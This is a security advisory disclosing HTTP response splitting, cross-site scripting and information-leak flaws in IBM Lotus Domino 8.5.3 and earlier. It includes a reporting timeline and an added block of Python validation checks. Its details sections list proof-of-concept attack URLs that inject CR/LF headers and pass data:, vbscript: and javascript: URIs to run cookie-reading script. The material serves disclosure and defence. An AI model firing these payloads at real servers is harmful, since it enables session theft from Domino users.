HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino

I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. On 15 August IBM released an advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3301.

-------------------------
Affected products:
-------------------------

IBM Lotus Domino 8.5.3 and earlier versions are vulnerable. These vulnerabilities will be fixed in Domino 8.5.4; IBM is still working on the other vulnerabilities I have reported to them.

For fixes, workarounds and mitigations, refer to the IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160

----------
Details:
----------

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Works in various browsers (in Mozilla Firefox, only in versions before 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Works in all versions of Firefox, but without access to cookies:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

The Location header can also be used for an XSS attack (with its own browser-specific nuances).

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URIs.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

In x.nsf, "x" is the username of the logged-in user.
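Both issues above come down to untrusted input reaching a sensitive sink: a URL path fragment with %0A ending up in a response header, and an attacker-chosen Src parameter being loaded into a frame. The checks below are an added illustration of the corresponding server-side mitigations, not IBM or Domino code; all function names and the sample URLs are constructed for this example.

```python
"""Defensive checks for the two Domino issues above (added example, not IBM code):
reject CR/LF in values that end up in response headers, and restrict a frameset
'Src' parameter to same-origin relative paths so that data:, vbscript: and
javascript: URIs are never loaded into a frame."""
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit


def has_header_injection(raw_value: str) -> bool:
    """True if the value, once percent-decoded, contains CR or LF."""
    # %0A / %0D in the request path decode to line breaks, which is what
    # lets a single response be split into two.
    decoded = unquote(raw_value)
    return "\r" in decoded or "\n" in decoded


def safe_header_value(raw_value: str) -> str:
    """Return the decoded value for use in a header, or raise if it would split the response."""
    if has_header_injection(raw_value):
        raise ValueError("CR/LF in header value: possible HTTP response splitting")
    return unquote(raw_value)


def is_safe_frame_src(src: str) -> bool:
    """Accept only a relative path on this origin as a frame source."""
    decoded = unquote(src).strip()
    parts = urlsplit(decoded)
    # Any scheme at all (data:, vbscript:, javascript:, http:) or an explicit
    # host is rejected; only same-origin paths may be framed.
    if parts.scheme or parts.netloc:
        return False
    # Scheme-relative "//host" and backslash variants would still leave the origin.
    if decoded.startswith("//") or "\\" in decoded:
        return False
    return decoded.startswith("/")


def frame_src_from_url(url: str) -> Optional[str]:
    """Extract Src from an OpenFrameSet request URL; None unless it is safe to frame."""
    query = parse_qs(urlsplit(url).query)
    src = query.get("Src", [None])[0]
    if src is None or not is_safe_frame_src(src):
        return None
    return src
```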

------------
Timeline:
------------

The full timeline is in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I wrote five advisories via the contact form at IBM's site.
- On 31.05 I resent the five advisories to IBM PSIRT, which received them and said they would send them to the developers (of Lotus products).
- On 15.08 IBM released their advisory (about the Cross-Site Scripting and HTTP Response Splitting holes - just a few of the total number of holes).
- On 28.08.2012 I disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).

XSS (WASC-08):

In March 2008 this XSS worked in the following way:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

Since then the attack vector via javascript: URI has been fixed (it's quite possible that my German client informed IBM in 2008 about the multiple holes I found in Domino). But an attack via data: and vbscript: URIs is still possible.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

The page https://site/domcfg.nsf, which is accessible without authentication, leaks information about the web server configuration. I have seen this situation at many sites running Lotus Domino.
